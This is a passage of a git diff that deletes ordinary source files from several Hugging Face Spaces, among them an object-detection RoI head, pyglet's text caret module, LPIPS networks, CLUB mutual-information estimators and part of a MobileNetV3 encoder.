is not None) ^ - (pos_inds is not None and bbox_feats is not None)) - if rois is not None: - mask_feats = self.mask_roi_extractor( - x[:self.mask_roi_extractor.num_inputs], rois) - if self.with_shared_head: - mask_feats = self.shared_head(mask_feats) - else: - assert bbox_feats is not None - mask_feats = bbox_feats[pos_inds] - - mask_pred = self.mask_head(mask_feats) - mask_results = dict(mask_pred=mask_pred, mask_feats=mask_feats) - return mask_results - - async def async_simple_test(self, - x, - proposal_list, - img_metas, - proposals=None, - rescale=False): - """Async test without augmentation.""" - assert self.with_bbox, 'Bbox head must be implemented.' - - det_bboxes, det_labels = await self.async_test_bboxes( - x, img_metas, proposal_list, self.test_cfg, rescale=rescale) - bbox_results = bbox2result(det_bboxes, det_labels, - self.bbox_head.num_classes) - if not self.with_mask: - return bbox_results - else: - segm_results = await self.async_test_mask( - x, - img_metas, - det_bboxes, - det_labels, - rescale=rescale, - mask_test_cfg=self.test_cfg.get('mask')) - return bbox_results, segm_results - - def simple_test(self, - x, - proposal_list, - img_metas, - proposals=None, - rescale=False): - """Test without augmentation.""" - assert self.with_bbox, 'Bbox head must be implemented.' - - det_bboxes, det_labels = self.simple_test_bboxes( - x, img_metas, proposal_list, self.test_cfg, rescale=rescale) - if torch.onnx.is_in_onnx_export(): - if self.with_mask: - segm_results = self.simple_test_mask( - x, img_metas, det_bboxes, det_labels, rescale=rescale) - return det_bboxes, det_labels, segm_results - else: - return det_bboxes, det_labels - - bbox_results = [ - bbox2result(det_bboxes[i], det_labels[i], - self.bbox_head.num_classes) - for i in range(len(det_bboxes)) - ] - - if not self.with_mask: - return bbox_results - else: - segm_results = self.simple_test_mask( - x, img_metas, det_bboxes, det_labels, rescale=rescale) - return list(zip(bbox_results, segm_results)) - - def aug_test(self, x, proposal_list, img_metas, rescale=False): - """Test with augmentations. - - If rescale is False, then returned bboxes and masks will fit the scale - of imgs[0]. - """ - det_bboxes, det_labels = self.aug_test_bboxes(x, img_metas, - proposal_list, - self.test_cfg) - - if rescale: - _det_bboxes = det_bboxes - else: - _det_bboxes = det_bboxes.clone() - _det_bboxes[:, :4] *= det_bboxes.new_tensor( - img_metas[0][0]['scale_factor']) - bbox_results = bbox2result(_det_bboxes, det_labels, - self.bbox_head.num_classes) - - # det_bboxes always keep the original scale - if self.with_mask: - segm_results = self.aug_test_mask(x, img_metas, det_bboxes, - det_labels) - return [(bbox_results, segm_results)] - else: - return [bbox_results] diff --git a/spaces/abrar-lohia/text-2-character-anim/pyrender/.eggs/pyglet-2.0.5-py3.10.egg/pyglet/text/caret.py b/spaces/abrar-lohia/text-2-character-anim/pyrender/.eggs/pyglet-2.0.5-py3.10.egg/pyglet/text/caret.py deleted file mode 100644 index e78ea645bd0334cf75adfd67ccd2b98853df2b7d..0000000000000000000000000000000000000000 --- a/spaces/abrar-lohia/text-2-character-anim/pyrender/.eggs/pyglet-2.0.5-py3.10.egg/pyglet/text/caret.py +++ /dev/null @@ -1,545 +0,0 @@ -"""Provides keyboard and mouse editing procedures for text layout. - -Example usage:: - - from pyglet import window - from pyglet.text import layout, caret - - my_window = window.Window(...) - my_layout = layout.IncrementalTextLayout(...) - my_caret = caret.Caret(my_layout) - my_window.push_handlers(my_caret) - -.. versionadded:: 1.1 -""" - -import re -import time - -from pyglet import clock -from pyglet import event -from pyglet.window import key - - -class Caret: - """Visible text insertion marker for - `pyglet.text.layout.IncrementalTextLayout`. - - The caret is drawn as a single vertical bar at the document `position` - on a text layout object. If `mark` is not None, it gives the unmoving - end of the current text selection. The visible text selection on the - layout is updated along with `mark` and `position`. - - By default the layout's graphics batch is used, so the caret does not need - to be drawn explicitly. Even if a different graphics batch is supplied, - the caret will be correctly positioned and clipped within the layout. - - Updates to the document (and so the layout) are automatically propagated - to the caret. - - The caret object can be pushed onto a window event handler stack with - `Window.push_handlers`. The caret will respond correctly to keyboard, - text, mouse and activation events, including double- and triple-clicks. - If the text layout is being used alongside other graphical widgets, a - GUI toolkit will be needed to delegate keyboard and mouse events to the - appropriate widget. pyglet does not provide such a toolkit at this stage. - """ - - _next_word_re = re.compile(r'(?<=\W)\w') - _previous_word_re = re.compile(r'(?<=\W)\w+\W*$') - _next_para_re = re.compile(r'\n', flags=re.DOTALL) - _previous_para_re = re.compile(r'\n', flags=re.DOTALL) - - _position = 0 - - _active = True - _visible = True - _blink_visible = True - _click_count = 0 - _click_time = 0 - - #: Blink period, in seconds. - PERIOD = 0.5 - - #: Pixels to scroll viewport per mouse scroll wheel movement. - #: Defaults to 12pt at 96dpi. - SCROLL_INCREMENT = 12 * 96 // 72 - - _mark = None - - def __init__(self, layout, batch=None, color=(0, 0, 0)): - """Create a caret for a layout. - - By default the layout's batch is used, so the caret does not need to - be drawn explicitly. - - :Parameters: - `layout` : `~pyglet.text.layout.TextLayout` - Layout to control. - `batch` : `~pyglet.graphics.Batch` - Graphics batch to add vertices to. - `color` : (int, int, int) - RGB tuple with components in range [0, 255]. - - """ - from pyglet import gl - self._layout = layout - batch = batch or layout.batch - group = layout.foreground_decoration_group - colors = (*color, 255, *color, 255) - - self._list = group.program.vertex_list(2, gl.GL_LINES, batch, group, colors=('Bn', colors)) - self._ideal_x = None - self._ideal_line = None - self._next_attributes = {} - - self.visible = True - - layout.push_handlers(self) - - def delete(self): - """Remove the caret from its batch. - - Also disconnects the caret from further layout events. - """ - self._list.delete() - self._layout.remove_handlers(self) - - def _blink(self, dt): - if self.PERIOD: - self._blink_visible = not self._blink_visible - if self._visible and self._active and self._blink_visible: - alpha = 255 - else: - alpha = 0 - self._list.colors[3] = alpha - self._list.colors[7] = alpha - - def _nudge(self): - self.visible = True - - @property - def visible(self): - """Caret visibility. - - The caret may be hidden despite this property due to the periodic blinking - or by `on_deactivate` if the event handler is attached to a window. - - :type: bool - """ - return self._visible - - @visible.setter - def visible(self, visible): - self._visible = visible - clock.unschedule(self._blink) - if visible and self._active and self.PERIOD: - clock.schedule_interval(self._blink, self.PERIOD) - self._blink_visible = False # flipped immediately by next blink - self._blink(0) - - @property - def color(self): - """Caret color. - - The default caret color is ``[0, 0, 0]`` (black). Each RGB color - component is in the range 0 to 255. - - :type: (int, int, int) - """ - return self._list.colors[:3] - - @color.setter - def color(self, color): - self._list.colors[:3] = color - self._list.colors[4:7] = color - - @property - def position(self): - """Position of caret within document.""" - return self._position - - @position.setter - def position(self, position): - self._position = position - self._next_attributes.clear() - self._update() - - @property - def mark(self): - """Position of immovable end of text selection within document. - - An interactive text selection is determined by its immovable end (the - caret's position when a mouse drag begins) and the caret's position, which - moves interactively by mouse and keyboard input. - - This property is ``None`` when there is no selection. - - :type: int - """ - return self._mark - - @mark.setter - def mark(self, mark): - self._mark = mark - self._update(line=self._ideal_line) - if mark is None: - self._layout.set_selection(0, 0) - - @property - def line(self): - """Index of line containing the caret's position. - - When set, `position` is modified to place the caret on requested line - while maintaining the closest possible X offset. - - :rtype: int - """ - if self._ideal_line is not None: - return self._ideal_line - else: - return self._layout.get_line_from_position(self._position) - - @line.setter - def line(self, line): - if self._ideal_x is None: - self._ideal_x, _ = self._layout.get_point_from_position(self._position) - self._position = self._layout.get_position_on_line(line, self._ideal_x) - self._update(line=line, update_ideal_x=False) - - def get_style(self, attribute): - """Get the document's named style at the caret's current position. - - If there is a text selection and the style varies over the selection, - `pyglet.text.document.STYLE_INDETERMINATE` is returned. - - :Parameters: - `attribute` : str - Name of style attribute to retrieve. See - `pyglet.text.document` for a list of recognised attribute - names. - - :rtype: object - """ - if self._mark is None or self._mark == self._position: - try: - return self._next_attributes[attribute] - except KeyError: - return self._layout.document.get_style(attribute, self._position) - - start = min(self._position, self._mark) - end = max(self._position, self._mark) - return self._layout.document.get_style_range(attribute, start, end) - - def set_style(self, attributes): - """Set the document style at the caret's current position. - - If there is a text selection the style is modified immediately. - Otherwise, the next text that is entered before the position is - modified will take on the given style. - - :Parameters: - `attributes` : dict - Dict mapping attribute names to style values. See - `pyglet.text.document` for a list of recognised attribute - names. - - """ - - if self._mark is None or self._mark == self._position: - self._next_attributes.update(attributes) - return - - start = min(self._position, self._mark) - end = max(self._position, self._mark) - self._layout.document.set_style(start, end, attributes) - - def _delete_selection(self): - start = min(self._mark, self._position) - end = max(self._mark, self._position) - self._position = start - self._mark = None - self._layout.document.delete_text(start, end) - self._layout.set_selection(0, 0) - - def move_to_point(self, x, y): - """Move the caret close to the given window coordinate. - - The `mark` will be reset to ``None``. - - :Parameters: - `x` : int - X coordinate. - `y` : int - Y coordinate. - - """ - line = self._layout.get_line_from_point(x, y) - self._mark = None - self._layout.set_selection(0, 0) - self._position = self._layout.get_position_on_line(line, x) - self._update(line=line) - self._next_attributes.clear() - - def select_to_point(self, x, y): - """Move the caret close to the given window coordinate while - maintaining the `mark`. - - :Parameters: - `x` : int - X coordinate. - `y` : int - Y coordinate. - - """ - line = self._layout.get_line_from_point(x, y) - self._position = self._layout.get_position_on_line(line, x) - self._update(line=line) - self._next_attributes.clear() - - def select_word(self, x, y): - """Select the word at the given window coordinate. - - :Parameters: - `x` : int - X coordinate. - `y` : int - Y coordinate. - - """ - line = self._layout.get_line_from_point(x, y) - p = self._layout.get_position_on_line(line, x) - m1 = self._previous_word_re.search(self._layout.document.text, 0, p+1) - if not m1: - m1 = 0 - else: - m1 = m1.start() - self.mark = m1 - - m2 = self._next_word_re.search(self._layout.document.text, p) - if not m2: - m2 = len(self._layout.document.text) - else: - m2 = m2.start() - - self._position = m2 - self._update(line=line) - self._next_attributes.clear() - - def select_paragraph(self, x, y): - """Select the paragraph at the given window coordinate. - - :Parameters: - `x` : int - X coordinate. - `y` : int - Y coordinate. - - """ - line = self._layout.get_line_from_point(x, y) - p = self._layout.get_position_on_line(line, x) - self.mark = self._layout.document.get_paragraph_start(p) - self._position = self._layout.document.get_paragraph_end(p) - self._update(line=line) - self._next_attributes.clear() - - def _update(self, line=None, update_ideal_x=True): - if line is None: - line = self._layout.get_line_from_position(self._position) - self._ideal_line = None - else: - self._ideal_line = line - x, y = self._layout.get_point_from_position(self._position, line) - z = self._layout.z - if update_ideal_x: - self._ideal_x = x - - x += self._layout.x - y += self._layout.y + self._layout.height - - font = self._layout.document.get_font(max(0, self._position - 1)) - self._list.position[:] = [x, y + font.descent, z, x, y + font.ascent, z] - - if self._mark is not None: - self._layout.set_selection(min(self._position, self._mark), max(self._position, self._mark)) - - self._layout.ensure_line_visible(line) - self._layout.ensure_x_visible(x) - - def on_layout_update(self): - """Handler for the `IncrementalTextLayout.on_layout_update` event. - """ - if self.position > len(self._layout.document.text): - self.position = len(self._layout.document.text) - self._update() - - def on_text(self, text): - """Handler for the `pyglet.window.Window.on_text` event. - - Caret keyboard handlers assume the layout always has keyboard focus. - GUI toolkits should filter keyboard and text events by widget focus - before invoking this handler. - """ - if self._mark is not None: - self._delete_selection() - - text = text.replace('\r', '\n') - pos = self._position - self._position += len(text) - self._layout.document.insert_text(pos, text, self._next_attributes) - self._nudge() - return event.EVENT_HANDLED - - def on_text_motion(self, motion, select=False): - """Handler for the `pyglet.window.Window.on_text_motion` event. - - Caret keyboard handlers assume the layout always has keyboard focus. - GUI toolkits should filter keyboard and text events by widget focus - before invoking this handler. - """ - if motion == key.MOTION_BACKSPACE: - if self.mark is not None: - self._delete_selection() - elif self._position > 0: - self._position -= 1 - self._layout.document.delete_text(self._position, self._position + 1) - self._update() - elif motion == key.MOTION_DELETE: - if self.mark is not None: - self._delete_selection() - elif self._position < len(self._layout.document.text): - self._layout.document.delete_text(self._position, self._position + 1) - elif self._mark is not None and not select: - self._mark = None - self._layout.set_selection(0, 0) - - if motion == key.MOTION_LEFT: - self.position = max(0, self.position - 1) - elif motion == key.MOTION_RIGHT: - self.position = min(len(self._layout.document.text), self.position + 1) - elif motion == key.MOTION_UP: - self.line = max(0, self.line - 1) - elif motion == key.MOTION_DOWN: - line = self.line - if line < self._layout.get_line_count() - 1: - self.line = line + 1 - elif motion == key.MOTION_BEGINNING_OF_LINE: - self.position = self._layout.get_position_from_line(self.line) - elif motion == key.MOTION_END_OF_LINE: - line = self.line - if line < self._layout.get_line_count() - 1: - self._position = self._layout.get_position_from_line(line + 1) - 1 - self._update(line) - else: - self.position = len(self._layout.document.text) - elif motion == key.MOTION_BEGINNING_OF_FILE: - self.position = 0 - elif motion == key.MOTION_END_OF_FILE: - self.position = len(self._layout.document.text) - elif motion == key.MOTION_NEXT_WORD: - pos = self._position + 1 - m = self._next_word_re.search(self._layout.document.text, pos) - if not m: - self.position = len(self._layout.document.text) - else: - self.position = m.start() - elif motion == key.MOTION_PREVIOUS_WORD: - pos = self._position - m = self._previous_word_re.search(self._layout.document.text, 0, pos) - if not m: - self.position = 0 - else: - self.position = m.start() - - self._next_attributes.clear() - self._nudge() - return event.EVENT_HANDLED - - def on_text_motion_select(self, motion): - """Handler for the `pyglet.window.Window.on_text_motion_select` event. - - Caret keyboard handlers assume the layout always has keyboard focus. - GUI toolkits should filter keyboard and text events by widget focus - before invoking this handler. - """ - if self.mark is None: - self.mark = self.position - self.on_text_motion(motion, True) - return event.EVENT_HANDLED - - def on_mouse_scroll(self, x, y, scroll_x, scroll_y): - """Handler for the `pyglet.window.Window.on_mouse_scroll` event. - - Mouse handlers do not check the bounds of the coordinates: GUI - toolkits should filter events that do not intersect the layout - before invoking this handler. - - The layout viewport is scrolled by `SCROLL_INCREMENT` pixels per - "click". - """ - self._layout.view_x -= scroll_x * self.SCROLL_INCREMENT - self._layout.view_y += scroll_y * self.SCROLL_INCREMENT - return event.EVENT_HANDLED - - def on_mouse_press(self, x, y, button, modifiers): - """Handler for the `pyglet.window.Window.on_mouse_press` event. - - Mouse handlers do not check the bounds of the coordinates: GUI - toolkits should filter events that do not intersect the layout - before invoking this handler. - - This handler keeps track of the number of mouse presses within - a short span of time and uses this to reconstruct double- and - triple-click events for selecting words and paragraphs. This - technique is not suitable when a GUI toolkit is in use, as the active - widget must also be tracked. Do not use this mouse handler if - a GUI toolkit is being used. - """ - t = time.time() - if t - self._click_time < 0.25: - self._click_count += 1 - else: - self._click_count = 1 - self._click_time = time.time() - - if self._click_count == 1: - self.move_to_point(x, y) - elif self._click_count == 2: - self.select_word(x, y) - elif self._click_count == 3: - self.select_paragraph(x, y) - self._click_count = 0 - - self._nudge() - return event.EVENT_HANDLED - - def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers): - """Handler for the `pyglet.window.Window.on_mouse_drag` event. - - Mouse handlers do not check the bounds of the coordinates: GUI - toolkits should filter events that do not intersect the layout - before invoking this handler. - """ - if self.mark is None: - self.mark = self.position - self.select_to_point(x, y) - self._nudge() - return event.EVENT_HANDLED - - def on_activate(self): - """Handler for the `pyglet.window.Window.on_activate` event. - - The caret is hidden when the window is not active. - """ - self._active = True - self.visible = self._active - return event.EVENT_HANDLED - - def on_deactivate(self): - """Handler for the `pyglet.window.Window.on_deactivate` event. - - The caret is hidden when the window is not active. - """ - self._active = False - self.visible = self._active - return event.EVENT_HANDLED diff --git a/spaces/adirik/stylemc-demo/encoder4editing/criteria/lpips/networks.py b/spaces/adirik/stylemc-demo/encoder4editing/criteria/lpips/networks.py deleted file mode 100644 index 3a0d13ad2d560278f16586da68d3a5eadb26e746..0000000000000000000000000000000000000000 --- a/spaces/adirik/stylemc-demo/encoder4editing/criteria/lpips/networks.py +++ /dev/null @@ -1,96 +0,0 @@ -from typing import Sequence - -from itertools import chain - -import torch -import torch.nn as nn -from torchvision import models - -from criteria.lpips.utils import normalize_activation - - -def get_network(net_type: str): - if net_type == 'alex': - return AlexNet() - elif net_type == 'squeeze': - return SqueezeNet() - elif net_type == 'vgg': - return VGG16() - else: - raise NotImplementedError('choose net_type from [alex, squeeze, vgg].') - - -class LinLayers(nn.ModuleList): - def __init__(self, n_channels_list: Sequence[int]): - super(LinLayers, self).__init__([ - nn.Sequential( - nn.Identity(), - nn.Conv2d(nc, 1, 1, 1, 0, bias=False) - ) for nc in n_channels_list - ]) - - for param in self.parameters(): - param.requires_grad = False - - -class BaseNet(nn.Module): - def __init__(self): - super(BaseNet, self).__init__() - - # register buffer - self.register_buffer( - 'mean', torch.Tensor([-.030, -.088, -.188])[None, :, None, None]) - self.register_buffer( - 'std', torch.Tensor([.458, .448, .450])[None, :, None, None]) - - def set_requires_grad(self, state: bool): - for param in chain(self.parameters(), self.buffers()): - param.requires_grad = state - - def z_score(self, x: torch.Tensor): - return (x - self.mean) / self.std - - def forward(self, x: torch.Tensor): - x = self.z_score(x) - - output = [] - for i, (_, layer) in enumerate(self.layers._modules.items(), 1): - x = layer(x) - if i in self.target_layers: - output.append(normalize_activation(x)) - if len(output) == len(self.target_layers): - break - return output - - -class SqueezeNet(BaseNet): - def __init__(self): - super(SqueezeNet, self).__init__() - - self.layers = models.squeezenet1_1(True).features - self.target_layers = [2, 5, 8, 10, 11, 12, 13] - self.n_channels_list = [64, 128, 256, 384, 384, 512, 512] - - self.set_requires_grad(False) - - -class AlexNet(BaseNet): - def __init__(self): - super(AlexNet, self).__init__() - - self.layers = models.alexnet(True).features - self.target_layers = [2, 5, 8, 10, 12] - self.n_channels_list = [64, 192, 384, 256, 256] - - self.set_requires_grad(False) - - -class VGG16(BaseNet): - def __init__(self): - super(VGG16, self).__init__() - - self.layers = models.vgg16(True).features - self.target_layers = [4, 9, 16, 23, 30] - self.n_channels_list = [64, 128, 256, 512, 512] - - self.set_requires_grad(False) \ No newline at end of file diff --git a/spaces/akalin/DeepDanbooru_string/README.md b/spaces/akalin/DeepDanbooru_string/README.md deleted file mode 100644 index 4330b6f969246dc764a34ea254d2e807159f1c55..0000000000000000000000000000000000000000 --- a/spaces/akalin/DeepDanbooru_string/README.md +++ /dev/null @@ -1,39 +0,0 @@ ---- -title: DeepDanbooru String -emoji: 💬 -colorFrom: blue -colorTo: red -sdk: gradio -sdk_version: 3.6 -app_file: app.py -pinned: false -duplicated_from: NoCrypt/DeepDanbooru_string ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio`, `streamlit`, or `static` - -`sdk_version` : _string_ -Only applicable for `streamlit` SDK. -See [doc](https://hf.co/docs/hub/spaces) for more info on supported versions. - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code, or `static` html code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. diff --git a/spaces/akhaliq/VQMIVC/mi_estimators.py b/spaces/akhaliq/VQMIVC/mi_estimators.py deleted file mode 100644 index 27e08155720c4f9b4c993c6aff86aaedf1cfc014..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/VQMIVC/mi_estimators.py +++ /dev/null @@ -1,201 +0,0 @@ -''' -Modified from: https://github.com/Linear95/CLUB -''' - -import torch -import torch.nn as nn - -class CLUB(nn.Module): # CLUB: Mutual Information Contrastive Learning Upper Bound - ''' - This class provides the CLUB estimation to I(X,Y) - Method: - mi_est() : provides the estimation with input samples - loglikeli() : provides the log-likelihood of the approximation q(Y|X) with input samples - Arguments: - x_dim, y_dim : the dimensions of samples from X, Y respectively - hidden_size : the dimension of the hidden layer of the approximation network q(Y|X) - x_samples, y_samples : samples from X and Y, having shape [sample_size, x_dim/y_dim] - ''' - def __init__(self, x_dim, y_dim, hidden_size): - super(CLUB, self).__init__() - # p_mu outputs mean of q(Y|X) - self.p_mu = nn.Sequential(nn.Linear(x_dim, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, y_dim)) - # p_logvar outputs log of variance of q(Y|X) - self.p_logvar = nn.Sequential(nn.Linear(x_dim, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, y_dim), - nn.Tanh()) - # self.p_logvar = nn.Sequential(nn.Linear(x_dim, hidden_size//2), - # nn.ReLU(), - # nn.Linear(hidden_size//2, y_dim)) - - def get_mu_logvar(self, x_samples): - mu = self.p_mu(x_samples) - logvar = self.p_logvar(x_samples) - return mu, logvar - - def mi_est(self, x_samples, y_samples): - mu, logvar = self.get_mu_logvar(x_samples) - - # log of conditional probability of positive sample pairs - positive = - (mu - y_samples)**2 /2./logvar.exp() - - prediction_1 = mu.unsqueeze(1) # shape [nsample,1,dim] - y_samples_1 = y_samples.unsqueeze(0) # shape [1,nsample,dim] - - # log of conditional probability of negative sample pairs - negative = - ((y_samples_1 - prediction_1)**2).mean(dim=1)/2./logvar.exp() - - return (positive.sum(dim = -1) - negative.sum(dim = -1)).mean() - - def loglikeli(self, x_samples, y_samples): # unnormalized loglikelihood - mu, logvar = self.get_mu_logvar(x_samples) - return (-(mu - y_samples)**2 /logvar.exp()-logvar).sum(dim=1).mean(dim=0) - - - -class CLUBSample(nn.Module): # Sampled version of the CLUB estimator - def __init__(self, x_dim, y_dim, hidden_size): - super(CLUBSample, self).__init__() - self.p_mu = nn.Sequential(nn.Linear(x_dim, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, y_dim)) - - self.p_logvar = nn.Sequential(nn.Linear(x_dim, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, y_dim), - nn.Tanh()) - - def get_mu_logvar(self, x_samples): - mu = self.p_mu(x_samples) - logvar = self.p_logvar(x_samples) - return mu, logvar - - - def loglikeli(self, x_samples, y_samples): - mu, logvar = self.get_mu_logvar(x_samples) - return (-(mu - y_samples)**2 /logvar.exp()-logvar).sum(dim=1).mean(dim=0) - - - def mi_est(self, x_samples, y_samples): - mu, logvar = self.get_mu_logvar(x_samples) - - sample_size = x_samples.shape[0] - #random_index = torch.randint(sample_size, (sample_size,)).long() - random_index = torch.randperm(sample_size).long() - - positive = - (mu - y_samples)**2 / logvar.exp() - negative = - (mu - y_samples[random_index])**2 / logvar.exp() - upper_bound = (positive.sum(dim = -1) - negative.sum(dim = -1)).mean() - return upper_bound/2. - - -class CLUBSample_reshape(nn.Module): # Sampled version of the CLUB estimator - def __init__(self, x_dim, y_dim, hidden_size): - super(CLUBSample_reshape, self).__init__() - self.p_mu = nn.Sequential(nn.Linear(x_dim, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, y_dim)) - - self.p_logvar = nn.Sequential(nn.Linear(x_dim, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, y_dim), - nn.Tanh()) - - def get_mu_logvar(self, x_samples): - mu = self.p_mu(x_samples) - logvar = self.p_logvar(x_samples) - return mu, logvar - - - def loglikeli(self, x_samples, y_samples): - mu, logvar = self.get_mu_logvar(x_samples) - mu = mu.reshape(-1, mu.shape[-1]) # (bs, y_dim) -> (bs, 1, y_dim) -> (bs, T, y_dim) -> (bs*T, y_dim) - logvar = logvar.reshape(-1, logvar.shape[-1]) - y_samples = y_samples.reshape(-1, y_samples.shape[-1]) # (bs, T, y_dim) -> (bs*T, y_dim) - return (-(mu - y_samples)**2 /logvar.exp()-logvar).sum(dim=1).mean(dim=0) - - - def mi_est(self, x_samples, y_samples): - mu, logvar = self.get_mu_logvar(x_samples) - sample_size = mu.shape[0] - random_index = torch.randperm(sample_size).long() - y_shuffle = y_samples[random_index] - mu = mu.reshape(-1, mu.shape[-1]) # (bs, y_dim) -> (bs, 1, y_dim) -> (bs, T, y_dim) -> (bs*T, y_dim) - logvar = logvar.reshape(-1, logvar.shape[-1]) - y_samples = y_samples.reshape(-1, y_samples.shape[-1]) # (bs, T, y_dim) -> (bs*T, y_dim) - y_shuffle = y_shuffle.reshape(-1, y_shuffle.shape[-1]) # (bs, T, y_dim) -> (bs*T, y_dim) - - positive = - (mu - y_samples)**2 / logvar.exp() - negative = - (mu - y_shuffle)**2 / logvar.exp() - upper_bound = (positive.sum(dim = -1) - negative.sum(dim = -1)).mean() - return upper_bound/2. - - -class CLUBSample_group(nn.Module): # Sampled version of the CLUB estimator - def __init__(self, x_dim, y_dim, hidden_size): - super(CLUBSample_group, self).__init__() - self.p_mu = nn.Sequential(nn.Linear(x_dim, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, y_dim)) - - self.p_logvar = nn.Sequential(nn.Linear(x_dim, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, hidden_size//2), - nn.ReLU(), - nn.Linear(hidden_size//2, y_dim), - nn.Tanh()) - - def get_mu_logvar(self, x_samples): - mu = self.p_mu(x_samples) - logvar = self.p_logvar(x_samples) - return mu, logvar - - - def loglikeli(self, x_samples, y_samples): # unnormalized loglikelihood - mu, logvar = self.get_mu_logvar(x_samples) # mu/logvar: (bs, y_dim) - mu = mu.unsqueeze(1).expand(-1, y_samples.shape[1], -1).reshape(-1, mu.shape[-1]) # (bs, y_dim) -> (bs, 1, y_dim) -> (bs, T, y_dim) -> (bs*T, y_dim) - logvar = logvar.unsqueeze(1).expand(-1, y_samples.shape[1], -1).reshape(-1, logvar.shape[-1]) - y_samples = y_samples.reshape(-1, y_samples.shape[-1]) # (bs, T, y_dim) -> (bs*T, y_dim) - return (-(mu - y_samples)**2 /logvar.exp()-logvar).sum(dim=1).mean(dim=0) / 2 - - def mi_est(self, x_samples, y_samples): # x_samples: (bs, x_dim); y_samples: (bs, T, y_dim) - mu, logvar = self.get_mu_logvar(x_samples) - - sample_size = x_samples.shape[0] - #random_index = torch.randint(sample_size, (sample_size,)).long() - random_index = torch.randperm(sample_size).long() - - # log of conditional probability of positive sample pairs - mu_exp1 = mu.unsqueeze(1).expand(-1, y_samples.shape[1], -1) # (bs, y_dim) -> (bs, T, y_dim) - # logvar_exp1 = logvar.unqueeze(1).expand(-1, y_samples.shape[1], -1).reshape(-1, logvar.shape[-1]) - positive = - ((mu_exp1 - y_samples)**2).mean(dim=1) / logvar.exp() # mean along T - negative = - ((mu_exp1 - y_samples[random_index])**2).mean(dim=1) / logvar.exp() # mean along T - - return (positive.sum(dim = -1) - negative.sum(dim = -1)).mean() / 2 - - diff --git a/spaces/akhaliq/deeplab2/model/encoder/mobilenet.py b/spaces/akhaliq/deeplab2/model/encoder/mobilenet.py deleted file mode 100644 index 5bb1a8d1a3a1ac0c4a59b53f3c663d62cc95a689..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/deeplab2/model/encoder/mobilenet.py +++ /dev/null @@ -1,410 +0,0 @@ -# coding=utf-8 -# Copyright 2021 The Deeplab2 Authors. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -"""MobileNetV3 models for Deep Labeling. - -Reference: - Howard, A., Sandler, M., et al. Searching for mobilenetv3. In ICCV, 2019 -""" -from typing import Any, Callable, Mapping, Optional, Sequence - -import tensorflow as tf - -from deeplab2.model import utils -from deeplab2.model.layers import blocks -from deeplab2.model.layers import convolutions - -# The default input image channels. -_INPUT_CHANNELS = 3 - - -MNV3Small_BLOCK_SPECS = { - 'spec_name': 'MobileNetV3Small', - 'block_spec_schema': ['block_fn', 'kernel_size', 'strides', 'filters', - 'activation', 'se_ratio', 'expand_ratio', - 'is_endpoint'], - 'block_specs': [ - ('conv_bn', 3, 2, 16, - 'hard_swish', None, None, True), - ('inverted_bottleneck', 3, 2, 16, - 'relu', 0.25, 1, True), - ('inverted_bottleneck', 3, 2, 24, - 'relu', None, 72. / 16, False), - ('inverted_bottleneck', 3, 1, 24, - 'relu', None, 88. / 24, True), - ('inverted_bottleneck', 5, 2, 40, - 'hard_swish', 0.25, 4., False), - ('inverted_bottleneck', 5, 1, 40, - 'hard_swish', 0.25, 6., False), - ('inverted_bottleneck', 5, 1, 40, - 'hard_swish', 0.25, 6., False), - ('inverted_bottleneck', 5, 1, 48, - 'hard_swish', 0.25, 3., False), - ('inverted_bottleneck', 5, 1, 48, - 'hard_swish', 0.25, 3., True), - ('inverted_bottleneck', 5, 2, 96, - 'hard_swish', 0.25, 6., False), - ('inverted_bottleneck', 5, 1, 96, - 'hard_swish', 0.25, 6., False), - ('inverted_bottleneck', 5, 1, 96, - 'hard_swish', 0.25, 6., False), - ('conv_bn', 1, 1, 576, - 'hard_swish', None, None, True), - ] -} - - -MNV3Large_BLOCK_SPECS = { - 'spec_name': 'MobileNetV3Large', - 'block_spec_schema': ['block_fn', 'kernel_size', 'strides', 'filters', - 'activation', 'se_ratio', 'expand_ratio', - 'is_endpoint'], - 'block_specs': [ - ('conv_bn', 3, 2, 16, - 'hard_swish', None, None, False), - ('inverted_bottleneck', 3, 1, 16, - 'relu', None, 1., True), - ('inverted_bottleneck', 3, 2, 24, - 'relu', None, 4., False), - ('inverted_bottleneck', 3, 1, 24, - 'relu', None, 3., True), - ('inverted_bottleneck', 5, 2, 40, - 'relu', 0.25, 3., 